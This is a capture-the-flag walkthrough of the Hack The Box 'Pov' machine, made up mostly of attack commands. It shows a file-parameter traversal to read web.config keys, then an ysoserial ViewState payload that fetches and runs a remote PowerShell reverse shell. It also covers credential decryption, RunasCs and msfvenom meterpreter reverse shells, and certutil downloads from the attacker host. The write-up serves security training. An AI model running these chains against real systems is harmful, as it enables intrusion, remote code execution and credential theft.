sudo nmap -Pn -A 10.10.11.251
echo "10.10.11.251 pov.htb" | sudo tee -a /etc/hosts
When I visited port 80 I didn’t find anything of interest except dev
subdomain.
dirsearch -u http://pov.htb/
Using ffuf
, will check if there is any other subdomains for pov.htb
domain.
ffuf -c -ac -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H 'Host: FUZZ.pov.htb' -u http://pov.htb
dev
only let’s add that to /etc/hosts
echo "10.10.11.251 dev.pov.htb" | sudo tee -a /etc/hosts
There’s a download button in this page
Start the proxy in your burp suite and select the option of intercept is on
. After that hit the Download CV
Button.
In the request, we observe the parameter file=cv.pdf
. We can attempt to modify the filename to a more sensitive one, such as /web.config, and then send the request. Upon doing so, a file named web.config
is downloaded. This file likely contains valuable information for our investigation.
<configuration>
<system.web>
<customErrors mode="On" defaultRedirect="default.aspx" />
<httpRuntime targetFramework="4.5" />
<machineKey decryption="AES" decryptionKey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" validation="SHA1" validationKey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" />
</system.web>
<system.webServer>
<httpErrors>
<remove statusCode="403" subStatusCode="-1" />
<error statusCode="403" prefixLanguageFilePath="" path="http://dev.pov.htb:8080/portfolio" responseMode="Redirect" />
</httpErrors>
<httpRedirect enabled="true" destination="http://dev.pov.htb/portfolio" exactDestination="false" childOnly="true" />
</system.webServer>
</configuration>
after some google search, I found this hacktrick article : https://book.hacktricks.xyz/pentesting-web/deserialization/exploiting-__viewstate-parameter
These vulnerabilities arise when the ViewState mechanism is mishandled or improperly secured in ASP.NET web applications, potentially leading to Remote Code Execution (RCE) attacks. First, we’ll need to acquire the ysoserial.exe
tool, which is essential for generating malicious payloads. Next, we’ll create a PowerShell script for a reverse shell and encode it to base64. After installing the script on a Windows VM, we’ll use ysoserial.exe
with specific parameters to craft a customized ViewState payload, including encryption and validation keys, path, and the encoded PowerShell script. Finally, we’ll exploit the vulnerability by injecting the customized ViewState payload into the target application. Below are the commands for each step:
ysoserial.exe
tool. https://github.com/NHPT/ysoserial.net/releases/ to your windows virtual machinerev.ps1
ysoserial.exe
ysoserial.exe -p ViewState -g TextFormattingRunProperties --decryptionalg="AES" --decryptionkey="EnterKey" --validationalg="SHA1" --validationkey="EnterKey" --path="/portfolio/default.aspx" -c "powershell.exe iex (iwr http://ip:8000/rev.ps1 -UseBasicParsing)"
Terminal 1:
python3 -m http.server 8000
Terminal 2:
nc -nlvp 6666
http://dev.pov.htb
then click the Download CV in and capture the request using burpsuiteysoserial.exe
to __VIEWSTATE
parameter, and send the requestWe are in the shell of sfitz
. I got an interesting file in the Documents Folder of sfitz which contains the password of the privileged user alaading
PS C:\Users\sfitz\Documents> type connection.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">alaading</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cdfb54340c2929419cc739fe1a35bc88000000000200000000001066000000010000200000003b44db1dda743e1442e77627255768e65ae76e179107379a964fa8ff156cee21000000000e8000000002000020000000c0bd8a88cfd817ef9b7382f050190dae03b7c81add6b398b2d32fa5e5ade3eaa30000000a3d1e27f0b3c29dae1348e8adf92cb104ed1d95e39600486af909cf55e2ac0c239d4f671f79d80e425122845d4ae33b240000000b15cd305782edae7a3a75c7e8e3c7d43bc23eaae88fde733a28e1b9437d3766af01fdf6f2cf99d2a23e389326c786317447330113c5cfa25bc86fb0c6e1edda6</SS>
</Props>
</Obj>
</Objs>
Let’s decrypt this password, see the article for more info: https://mcpmag.com/articles/2017/07/20/save-and-read-sensitive-data-with-powershell.aspx
I use RunasCs
to get access to user alaading. RunasCs
is an utility to run specific processes with different permissions than the user’s current logon provides using explicit credentials.
I download RunasCs
to my kali vm, then unzip and placed directory where I setup python3 http server.
https://github.com/antonioCoco/RunasCs/releases
┌──(kali㉿kali)-[~]
└─$ ls
rev.ps1 RunasCs.exe
python3 -m http.server 8000
now in kali machine will create a netcat listener on port 5555
nc -nlvp 5555
then in victim machine will run RunasCs.exe
.\RunanCs.exe alaading f8gQ8fynP44ek1m3 cmd.exe -r 10.10.16.31:5555
Yeeah !!!! we got the user flag.
Looking at the permissions, I found that there is SeDebugPrivilege
, which can be directly shuttled with winlogon.
(But there is a question here. Why does the powershell generated by RunasCs have SeDebugPrivilege, but cmd does not have SeDebugPrivilege
)
Use metasploit to change my shell to facilitate process migration. (cmd interaction can be done with certutil.exe
’s built-in transmission)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.31 LPORT=6666 -f exe > shell.exe
started reverse TCP handler on port 6666
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.10.16.31
set lport 6666
run
so we configure python3 http server on kali machine to host our shell.exe
and on the vicitm machine we use certutil.exe
download it.
pyhthon3 -m http.server 8000
certutil.exe -urlcache -split -f http://10.10.16.31:8000/shell.exe shell.exe
Now let’s run the shell.exe